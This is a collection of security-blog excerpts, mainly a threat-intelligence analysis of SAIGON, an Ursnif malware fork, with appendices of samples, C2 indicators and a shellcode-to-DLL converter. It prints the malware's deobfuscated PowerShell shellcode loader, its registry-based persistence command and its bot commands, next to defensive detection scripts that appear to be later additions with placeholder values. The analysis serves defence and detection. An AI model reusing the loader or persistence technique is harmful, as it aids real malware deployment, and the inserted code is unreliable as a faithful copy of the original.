Embracing a new mindset, especially when it comes to our sacred technology habits, won’t be an easy task. However, if you know (and yes, you do know) that technology is taking up too much of your time, attention, and emotional bandwidth, then 2020 may be the perfect time to release digital distractions, rethink your technology choices, and reclaim the things that matter most.

The post Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset appeared first on McAfee Blogs.

SAIGON, the Mysterious Ursnif Fork

Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. While the first major version of Ursnif was identified in 2006, several subsequent versions have been released, in large part due to source code leaks. FireEye reported on a previously unidentified variant of the Ursnif malware family to our threat intelligence subscribers in September 2019 after identification of a server that hosted a collection of tools, which included multiple point-of-sale malware families. This malware self-identified as "SaiGon version 3.50 rev 132," and our analysis suggests it is likely based on the source code of the v3 (RM3) variant of Ursnif. Notably, rather than being a full-fledged banking malware, SAIGON's capabilities suggest it is a more generic backdoor, perhaps tailored for use in targeted cybercrime operations.

Technical Analysis


SAIGON appears on an infected computer as a Base64-encoded shellcode blob stored in a registry key, which is launched using PowerShell via a scheduled task. As with other Ursnif variants, the main component of the malware is a DLL file. This DLL has a single exported function, DllRegisterServer, which is an unused empty function. All the relevant functionality of the malware executes when the DLL is loaded and initialized via its entry point.

Upon initial execution, the malware generates a machine ID using the creation timestamp of either %SystemDrive%\pagefile.sys or %SystemDrive%\hiberfil.sys (whichever is identified first). Interestingly, the system drive is queried in a somewhat uncommon way, directly from the KUSER_SHARED_DATA structure (via SharedUserData→NtSystemRoot). KUSER_SHARED_DATA is a structure located in a special part of kernel memory that is mapped into the memory space of all user-mode processes (thus shared), and always located at a fixed memory address (0x7ffe0000, pointed to by the SharedUserData symbol).

The code then looks for the current shell process by using a call to GetWindowThreadProcessId(GetShellWindow(), …). The code also features a special check; if the checksum calculated from the name of the shell's parent process matches the checksum of explorer.exe (0xc3c07cf0), it will attempt to inject into the parent process instead.

SAIGON then injects into this process using the classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread combination of functions. Once this process is injected, it loads two embedded files from within its binary:

  • A PUBLIC.KEY file, which is used to verify and decrypt other embedded files and data coming from the malware's command and control (C2) server
  • A RUN.PS1 file, which is a PowerShell loader script template that contains a "@SOURCE@" placeholder within the script:

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("JHdneG1qZ2J4dGo9JGh

The malware replaces the "@SOURCE@" placeholder from this PowerShell script template with a Base64-encoded version of itself, and writes the PowerShell script to a registry value named "PsRun" under the "HKEY_CURRENT_USER\Identities\{<random_guid>}" registry key (Figure 1).

Figure 1: PowerShell script written to PsRun

The instance of SAIGON then creates a new scheduled task (Figure 2) with the name "Power<random_word>" (e.g. PowerSgs). If this is unsuccessful for any reason, it falls back to using the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" registry key to enable itself to maintain persistence through system reboot.

Figure 2: Scheduled task

Regardless of the persistence mechanism used, the command that executes the binary from the registry is similar to the following:


After removing the Base64 encoding from this command, it looks something like "iex (gp 'HKCU:\\Identities\\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun."  When executed, this command retrieves the contents of the previous registry value using Get-ItemProperty (gp) and executes it using Invoke-Expression (iex).
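The persistence chain above (a scheduled task or Run key whose Base64-wrapped command reads a "PsRun" value under HKCU\Identities\{<guid>} and passes it to Invoke-Expression) gives a defender something concrete to look for in scheduled-task and process command lines. The following is an added Python example, not code from the original analysis; it assumes the task command was passed through PowerShell's -EncodedCommand switch (Base64 of UTF-16LE text), which the analysis does not state, and the command lines it runs against are constructed.

```python
import base64
import re

# Patterns taken from the persistence artifacts described in the analysis: the
# script body lives in a "PsRun" value under HKCU\Identities\{<guid>} and is
# pulled back with Get-ItemProperty (gp) and fed to Invoke-Expression (iex).
GUID = r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}"
REGKEY_RE = re.compile(r"HKCU:\\{1,2}Identities\\{1,2}" + GUID, re.IGNORECASE)
PSRUN_RE = re.compile(r"\.PsRun\b", re.IGNORECASE)
IEX_GP_RE = re.compile(
    r"\b(?:iex|Invoke-Expression)\b.*\b(?:gp|Get-ItemProperty)\b",
    re.IGNORECASE | re.DOTALL)
# -EncodedCommand and its documented abbreviations; longest alternatives first.
ENC_RE = re.compile(
    r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded script of a -EncodedCommand argument, or the command line
    unchanged when no such argument is present. Assumption: the argument is Base64
    of UTF-16LE text, which is what PowerShell's switch expects."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def inspect_launcher(cmdline: str) -> dict:
    """Break a command line down into the three SAIGON launcher traits."""
    decoded = decode_encoded_command(cmdline)
    key = REGKEY_RE.search(decoded)
    return {
        "decoded": decoded,
        "registry_key": key.group(0) if key else None,
        "reads_psrun": bool(PSRUN_RE.search(decoded)),
        "iex_of_registry_value": bool(IEX_GP_RE.search(decoded)),
    }


def is_suspicious(cmdline: str) -> bool:
    """Flag when the command both addresses the Identities GUID key and reads PsRun."""
    r = inspect_launcher(cmdline)
    return r["registry_key"] is not None and r["reads_psrun"]


def triage(cmdlines):
    """Return the indices of command lines that match the launcher pattern."""
    return [i for i, c in enumerate(cmdlines) if is_suspicious(c)]


def encode_for_powershell(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: the decoded launcher quoted in the analysis, wrapped the way
# a scheduled task would carry it, beside an unrelated administrative task.
SAMPLE_SCRIPT = "iex (gp 'HKCU:\\Identities\\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun"
SAMPLE_TASK_CMD = "powershell.exe -enc " + encode_for_powershell(SAMPLE_SCRIPT)
BENIGN_TASK_CMD = "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"

if __name__ == "__main__":
    for cmd in (SAMPLE_TASK_CMD, BENIGN_TASK_CMD):
        print(is_suspicious(cmd), inspect_launcher(cmd)["registry_key"])
```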

Finally, the PowerShell code in the registry allocates a block of memory, copies the Base64-decoded shellcode blob into it, launches a new thread pointing to the area using CreateRemoteThread, and waits for the thread to complete. The following script is a deobfuscated and beautified version of the PowerShell.

# Shellcode blob, carried Base64-encoded in the PsRun registry value
$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
$wgxmjgbxtj = $hanksefksgu.Length;

# P/Invoke declarations compiled with Add-Type; the [DllImport] attributes are
# required for these extern declarations to compile. GetCurrentProcess and GetDC
# are declared but never used.
$tskvo = @"
[DllImport("kernel32.dll")]
public static extern Int32 GetCurrentProcess();

[DllImport("user32.dll")]
public static extern IntPtr GetDC(IntPtr mxxahxof);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateRemoteThread(IntPtr hcwylrbs, IntPtr wqer, uint sfj, IntPtr wllev, IntPtr wwdrictwdk, uint klmhnsk, IntPtr vcexsualwhh);

[DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr aj, UInt32 kdxsxev);

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr xy, uint knbt, uint tmrywhu, uint wgutud);
"@

$tskaaxotxe = Add-Type -memberDefinition $tskvo -Name 'Win32' -namespace Win32Functions -passthru;
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
$mhxkpull = $tskaaxotxe::VirtualAlloc(0, $wgxmjgbxtj, 0x3000, 0x40);
[System.Runtime.InteropServices.Marshal]::Copy($hanksefksgu, 0, $mhxkpull, $wgxmjgbxtj);
# -1 is the pseudo-handle of the current process, so the "remote" thread is local;
# the blob's start address is passed as both the thread entry point and its argument
$tdocnnwkvoq = $tskaaxotxe::CreateRemoteThread(-1, 0, 0, $mhxkpull, $mhxkpull, 0, 0);
$ocxxjmhiym = $tskaaxotxe::WaitForSingleObject($tdocnnwkvoq, 30000);

Once it has established a foothold on the machine, SAIGON loads and parses its embedded LOADER.INI configuration (see the Configuration section for details) and starts its main worker thread, which continuously polls the C2 server for commands.


The Ursnif source code incorporated a concept referred to as "joined data," which is a set of compressed/encrypted files bundled with the executable file. Early variants relied on a special structure placed after the PE header and marked with specific magic bytes ("JF," "FJ," "J1," "JJ," depending on the Ursnif version). In Ursnif v3 (Figure 3), this data is no longer simply after the PE header but pointed to by the Security Directory in the PE header, and the magic bytes have also been changed to "WD" (0x4457).

Figure 3: Ursnif v3 joined data

This structure defines the various properties (offset, size, and type) of the bundled files. This is the same exact method used by SAIGON for storing its three embedded files:

  • PUBLIC.KEY - RSA public key
  • RUN.PS1 - PowerShell script template
  • LOADER.INI - Malware configuration
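An added Python check (not part of the original analysis) for the joined-data convention just described: it follows the Security Directory entry of a PE file and reports whether the blob it points at begins with the 'WD' magic word. The layout of the joined-data structure beyond the magic is not described here and is not parsed; the PE image the example runs against is constructed inline.

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # index into the optional header's data directories
JOINED_DATA_MAGIC = 0x4457           # 'WD' read as a little-endian WORD


def find_joined_data(pe: bytes):
    """Return (file_offset, size) of an Ursnif v3 / SAIGON style joined-data blob
    referenced from the Security Directory, or None when the file has no such blob.
    Unlike every other directory, the Security entry holds a file offset, not an
    RVA. A legitimately signed binary keeps a WIN_CERTIFICATE there instead, which
    starts with a 4-byte length rather than 'WD'."""
    try:
        if len(pe) < 0x40 or pe[:2] != b'MZ':
            return None
        e_lfanew = struct.unpack_from('<I', pe, 0x3c)[0]
        if pe[e_lfanew:e_lfanew + 4] != b'PE\0\0':
            return None
        opt = e_lfanew + 0x18              # optional header follows the 20-byte file header
        magic = struct.unpack_from('<H', pe, opt)[0]
        if magic == 0x10b:
            dir_base = opt + 0x60          # PE32
        elif magic == 0x20b:
            dir_base = opt + 0x70          # PE32+
        else:
            return None
        entry = dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
        offset, size = struct.unpack_from('<II', pe, entry)
        if offset == 0 or size < 2 or offset + size > len(pe):
            return None
        if struct.unpack_from('<H', pe, offset)[0] != JOINED_DATA_MAGIC:
            return None
        return offset, size
    except struct.error:                   # truncated headers
        return None


def build_sample(joined: bytes, pe32plus: bool = False) -> bytes:
    """Construct a minimal, non-runnable PE image whose Security Directory points at
    `joined`, appended directly after the headers. Test input only, not a sample."""
    opt_size = 0xF0 if pe32plus else 0xE0
    e_lfanew = 0x40
    headers_len = e_lfanew + 0x18 + opt_size
    dos = b'MZ' + b'\0' * 0x3a + struct.pack('<I', e_lfanew)
    file_hdr = b'PE\0\0' + struct.pack(
        '<HHIIIHH', 0x8664 if pe32plus else 0x14c, 0, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into('<H', opt, 0, 0x20b if pe32plus else 0x10b)
    dir_base = 0x70 if pe32plus else 0x60
    struct.pack_into('<II', opt, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                     headers_len, len(joined))
    return dos + file_hdr + bytes(opt) + joined


# Constructed inputs: a blob carrying the 'WD' magic and one that mimics the start
# of a WIN_CERTIFICATE (length field first).
SAMPLE_JOINED = bytes([0x57, 0x44]) + b'\0' * 30
SAMPLE_PE32 = build_sample(SAMPLE_JOINED)
SAMPLE_PE32PLUS = build_sample(SAMPLE_JOINED, pe32plus=True)
SAMPLE_SIGNED_LIKE = build_sample(b'\x10\x00' + b'\0' * 30)

if __name__ == "__main__":
    for name, img in (("pe32", SAMPLE_PE32), ("pe32+", SAMPLE_PE32PLUS),
                      ("cert-like", SAMPLE_SIGNED_LIKE)):
        print(name, find_joined_data(img))
```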

The following is a list of configuration options observed:

  • List of C2 URLs used for communication
  • Serpent key used for communicating with the C2
  • Botnet ID
  • Number of seconds to wait before the initial request to the C2
  • Waits until the uptime is greater than this value (in seconds)
  • Number of seconds to wait between subsequent requests to the C2
  • The number of minutes to wait before switching to the next C2 server in case of failures

Table 1: Configuration options (option names and checksums not shown)


While the network communication structure of SAIGON is very similar to Ursnif v3, there are some subtle differences. SAIGON beacons are sent to the C2 servers as multipart/form-data encoded requests via HTTP POST to the "/index.html" URL path. The payload to be sent is first encrypted using Serpent encryption (in ECB mode vs CBC mode), then Base64-encoded. Responses from the server are encrypted with the same Serpent key and signed with the server's RSA private key.

SAIGON uses the following User-Agent header in its HTTP requests: "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0," where <os_version> consists of the operating system's major and minor version number (e.g. 10.0 on Windows 10, and 6.1 on Windows 7) and the string "; Win64; x64" is appended when the operating system is 64-bit. This yields the following example User Agent strings:

  • "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 10 64-bit
  • "Mozilla/5.0 (Windows NT 6.1; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 7 32-bit

The request format is also somewhat similar to the one used by other Ursnif variants; its components are described in Table 2:

  • Bot version (unlike other Ursnif variants this only contains the build number, so only the xxx digits from "")
  • Botnet ID
  • Client ID
  • Request type (0 – when polling for tasks, 6 – for system info data uploads)
  • Machine uptime in seconds
  • The bot "knock" period (number of seconds to wait between subsequent requests to the C2, see the LoadPeriod configuration option)

Table 2: Request format components (parameter names not shown)


SAIGON implements the bot commands described in Table 3.

  • Uninstalls itself from the machine; removes scheduled task and deletes its registry key
  • Download data from URL, decrypt and verify signature, save it as a .ps1 file and run it using "PowerShell.exe -ep unrestricted -file %s"
  • Collects and uploads system information by running:
      1. "systeminfo.exe"
      2. "net view"
      3. "nslookup"
      4. "tasklist.exe /SVC"
      5. "driverquery.exe"
      6. "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s"
  • Download data from URL, decrypt and verify, then use the same shellcode loader that was used to load itself into memory to load the DLL into the current process
  • Download data from URL, decrypt and verify, save with an .exe extension, invoke using ShellExecute

Table 3: SAIGON bot commands (command names and checksums not shown)

Comparison to Ursnif v3

Table 4 shows the similarities between Ursnif v3 and the analyzed SAIGON samples (differences are marked with an asterisk):

Persistence method
  Ursnif v3 (RM3): Scheduled task that executes code stored in a registry key using PowerShell
  Saigon (Ursnif v3.5?): Scheduled task that executes code stored in a registry key using PowerShell

Configuration storage
  Ursnif v3 (RM3): Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")
  Saigon (Ursnif v3.5?): Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")

PRNG algorithm
  (values not shown)

Checksum algorithm
  Ursnif v3 (RM3): JAMCRC (aka. CRC32 with all the bits flipped)
  Saigon (Ursnif v3.5?): CRC32, with the result rotated to the right by 1 bit *

Data compression
  (values not shown)

Data encryption
  Ursnif v3 (RM3): Serpent CBC
  Saigon (Ursnif v3.5?): Serpent ECB *

Data integrity verification
  Ursnif v3 (RM3): RSA signature
  Saigon (Ursnif v3.5?): RSA signature

Communication method
  Ursnif v3 (RM3): HTTP POST requests
  Saigon (Ursnif v3.5?): HTTP POST requests

Payload encoding
  Ursnif v3 (RM3): Unpadded Base64 ('+' and '/' are replaced with '_2B' and '_2F' respectively), random slashes are added
  Saigon (Ursnif v3.5?): Unpadded Base64 ('+' and '/' are replaced with '%2B' and '%2F' respectively), no random slashes *

Uses URL path mimicking?
  Ursnif v3 (RM3): Yes
  Saigon (Ursnif v3.5?): No *

Uses PX file format?
  (values not shown)

Table 4: Similarities and differences between Ursnif v3 and SAIGON samples
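Both checksum variants from Table 4, as an added Python example that is not part of the original analysis. The explorer.exe checksum 0xc3c07cf0 quoted earlier is only searched for, because the analysis does not say which string form (ASCII or UTF-16, original or folded case) the sample hashes; the build_lookup helper is the usual way to resolve hashed identifiers such as the checksums in Tables 1 to 3 from a candidate word list.

```python
import zlib

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits` positions."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def jamcrc(data: bytes) -> int:
    """Ursnif v3 (RM3) checksum: standard CRC32 with every result bit flipped."""
    return zlib.crc32(data) ^ MASK32


def saigon_checksum(data: bytes) -> int:
    """SAIGON checksum: standard CRC32 with the result rotated right by one bit."""
    return ror32(zlib.crc32(data), 1)


ALGORITHMS = {"jamcrc": jamcrc, "saigon": saigon_checksum}


def build_lookup(names, algorithm=saigon_checksum, encoding="ascii"):
    """Map checksum -> name for a list of candidate strings (API names, process
    names, config keys) so hashed identifiers found in a sample can be resolved."""
    return {algorithm(n.encode(encoding)): n for n in names}


def candidate_matches(name: str, expected: int):
    """Report every (algorithm, encoding, form) combination whose checksum of `name`
    equals `expected`. The analysis does not state which form the malware hashes,
    so the common choices are tried instead of assuming one."""
    forms = list(dict.fromkeys([name, name.lower(), name.upper()]))
    hits = []
    for alg_name, alg in ALGORITHMS.items():
        for enc in ("ascii", "utf-16-le"):
            for form in forms:
                if alg(form.encode(enc)) == expected:
                    hits.append((alg_name, enc, form))
    return hits


# Checksum the analysis quotes for the shell's parent process, explorer.exe
EXPLORER_CHECKSUM = 0xC3C07CF0

if __name__ == "__main__":
    for alg_name, alg in ALGORITHMS.items():
        print(alg_name, hex(alg(b"explorer.exe")))
    print("forms reproducing the quoted constant:",
          candidate_matches("explorer.exe", EXPLORER_CHECKSUM))
```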

Figure 4 shows Ursnif v3's use of URL path mimicking. This tactic has not been seen in other Ursnif variants, including SAIGON.

Figure 4: Ursnif v3 mimicking (red) previously seen benign browser traffic (green) not seen in SAIGON samples 


It is currently unclear whether SAIGON is representative of a broader evolution in the Ursnif malware ecosystem. The low number of SAIGON samples identified thus far—all of which have compilation timestamps in 2018—may suggest that SAIGON was a temporary branch of Ursnif v3 adapted for use in a small number of operations. Notably, SAIGON’s capabilities also distinguish it from typical banking malware and may be more suited toward supporting targeted intrusion operations. This is further supported via our prior identification of SAIGON on a server that hosted tools used in point-of-sale intrusion operations as well as VISA’s recent notification of the malware appearing on a compromised hospitality organization’s network along with tools previously used by FIN8.


The authors would like to thank Kimberly Goody, Jeremy Kennelly and James Wyke for their support on this blog post.

Appendix A: Samples

The following is a list of samples including their embedded configuration:

Sample SHA256: 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:30
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5cd0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:41
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5cd0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e
Sample Version: 3.50.199
PE Timestamp: 2018-11-15T11:17:09
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com

Group / Botnet ID: 1000
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 60
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1593518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9
Sample Version: 3.50.209
PE Timestamp: 2018-12-04T10:47:56
XOR Cookie: 0x40d822d9
C2 URLs:

  • http://softcloudstore[.]com
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

Botnet ID: 1000
Server Key: 0123456789ABCDEF
Idle Period: 20
Minimum Uptime: 300
Load Period: 1800
Host Keep Time: 360
RSA Public Key: (0xdb7c3a9ea68fbaf5ba1aebc782be3a9e75b92e677a114b52840d2bbafa8ca49da40a64664d80cd62d945370ee8137b4beb8ecf348ef247ddbd23f9b375bb64017a5607cb3849dc9b7a17d110ea613dc51e9d2aded, 0x10001)

Appendix B: IOCs

Sample hashes:

  • 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
  • c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
  • 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e [VT]
  • 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9 [VT]

C2 servers:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com
  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com
  • http://softcloudstore[.]com
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

User-Agent string:

  • "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0"

Other host-based indicators:

  • "Power<random_string>" scheduled task
  • "PsRun" value under the HKCU\Identities\{<random_guid>} registry key

Appendix C: Shellcode Converter Script

The following Python script is intended to ease analysis of this malware. This script converts the SAIGON shellcode blob back into its original DLL form by removing the PE loader and restoring its PE header. These changes make the analysis of SAIGON shellcode blobs much simpler (e.g. allow loading of the files in IDA), however, the created DLLs will still crash when run in a debugger as the malware still relies on its (now removed) PE loader during the process injection stage of its execution. After this conversion process, the sample is relatively easy to analyze due to its small size and because it is not obfuscated.

#!/usr/bin/env python3
import argparse
import struct
from datetime import datetime, timezone

# The published script embeds a stock DOS header/stub here as a hex string; that
# blob is not reproduced on this page. A minimal 0x40-byte DOS header whose
# e_lfanew field (offset 0x3c) points straight past itself is used instead.
MZ_HEADER = b'MZ' + b'\0' * 0x3a + struct.pack('<I', 0x40)

# Section names and characteristics are not part of the listing as reproduced
# here; these are placeholders (code: executable/readable, data: readable/writable).
SECTION_NAMES = [b'.text', b'.data', b'.data1', b'.data2', b'.data3']
CHARACTERISTICS_CODE = 0x60000020   # IMAGE_SCN_CNT_CODE | MEM_EXECUTE | MEM_READ
CHARACTERISTICS_DATA = 0xC0000040   # IMAGE_SCN_CNT_INITIALIZED_DATA | MEM_READ | MEM_WRITE


def write_section(data, table_offset, index, virtual_size, virtual_address, raw_size, raw_pointer):
    """Write one IMAGE_SECTION_HEADER entry into the (zeroed) section table."""
    characteristics = CHARACTERISTICS_CODE if index == 0 else CHARACTERISTICS_DATA
    struct.pack_into('=8sIIIIIIHHI', data, table_offset + 0x28 * index,
        SECTION_NAMES[index],
        virtual_size, virtual_address,
        raw_size, raw_pointer,
        0, 0,   # PointerToRelocations, PointerToLinenumbers
        0, 0,   # NumberOfRelocations, NumberOfLinenumbers
        characteristics)


def main():
    parser = argparse.ArgumentParser(description="Shellcode to PE converter for the Saigon malware family.")
    parser.add_argument("sample", help="path to the SAIGON shellcode blob")
    args = parser.parse_args()

    with open(args.sample, "rb") as f:
        data = bytearray(f.read())

    if data.startswith(b'MZ'):
        print('This is already an MZ/PE file.')
        return
    elif not data.startswith(b'\xe9'):
        print('Unknown file type.')
        return

    # The blob starts with the NT headers, whose first five bytes were overwritten
    # by the loader's jump (E9 rel32); byte 5 still holds the high byte of Machine.
    struct.pack_into('=I', data, 0, 0x00004550)  # "PE\0\0" signature
    if data[5] == 0x01:
        struct.pack_into('=H', data, 4, 0x14c)   # IMAGE_FILE_MACHINE_I386
    elif data[5] == 0x86:
        struct.pack_into('=H', data, 4, 0x8664)  # IMAGE_FILE_MACHINE_AMD64
    else:
        print('Unknown architecture.')
        return

    # file alignment
    struct.pack_into('=I', data, 0x3c, 0x200)

    optional_header_size, _ = struct.unpack_from('=HH', data, 0x14)
    magic, _, _, size_of_code = struct.unpack_from('=HBBI', data, 0x18)
    print('Magic:', hex(magic))
    print('Size of code:', hex(size_of_code))

    base_of_code, base_of_data = struct.unpack_from('=II', data, 0x2c)

    if magic == 0x20b:
        # base of data does not exist in PE32+: assume data starts on the first
        # page boundary after the code
        if size_of_code & 0x0fff:
            tmp = (size_of_code & 0xfffff000) + 0x1000
        else:
            tmp = size_of_code
        base_of_data = base_of_code + tmp

    print('Base of code:', hex(base_of_code))
    print('Base of data:', hex(base_of_data))

    # wipe everything between the optional header and the first section (0x1000);
    # the section table is rebuilt below
    section_table = 0x18 + optional_header_size
    data[section_table:0x1000] = b'\0' * (0x1000 - section_table)

    size_of_header = struct.unpack_from('=I', data, 0x54)[0]

    # the data section is taken to end where the constant table 3, 5, 7, 11, 13 begins
    data_size = 0x3000
    pos = data.find(struct.pack('=IIIII', 3, 5, 7, 11, 13))
    if pos >= 0:
        data_size = pos - base_of_data

    def raw(rva):
        # file offset of an RVA once the headers are shrunk to size_of_header bytes
        return size_of_header + rva - base_of_code

    end_of_data = base_of_data + data_size
    tail_size = len(data[end_of_data + 0x2000:])
    write_section(data, section_table, 0, size_of_code, base_of_code, base_of_data - base_of_code, raw(base_of_code))
    write_section(data, section_table, 1, data_size, base_of_data, data_size, raw(base_of_data))
    write_section(data, section_table, 2, 0x1000, end_of_data, 0x1000, raw(end_of_data))
    if magic == 0x20b:
        write_section(data, section_table, 3, 0x1000, end_of_data + 0x1000, 0x1000, raw(end_of_data + 0x1000))
        write_section(data, section_table, 4, 0x1600, end_of_data + 0x2000, tail_size, raw(end_of_data + 0x2000))
    else:
        write_section(data, section_table, 3, 0x1000, end_of_data + 0x1000, 0x1000, raw(end_of_data + 0x1000))
        write_section(data, section_table, 4, 0x2000, end_of_data + 0x2000, tail_size, raw(end_of_data + 0x2000))

    header = MZ_HEADER + data[:size_of_header - len(MZ_HEADER)]
    pe = bytearray(header + data[0x1000:])
    with open(args.sample + '.dll', 'wb') as f:
        f.write(pe)

    lfanew = struct.unpack_from('=I', pe, 0x3c)[0]
    timestamp = struct.unpack_from('=I', pe, lfanew + 8)[0]
    print('PE timestamp:', datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat())


if __name__ == "__main__":
    main()

MESSAGETAP: Who’s Reading Your Text Messages?

FireEye Mandiant recently discovered a new malware family used by APT41 (a Chinese APT group) that is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft. Named MESSAGETAP, the tool was deployed by APT41 in a telecommunications network provider in support of Chinese espionage efforts. APT41’s operations have included state-sponsored cyber espionage missions as well as financially-motivated intrusions. These operations have spanned from as early as 2012 t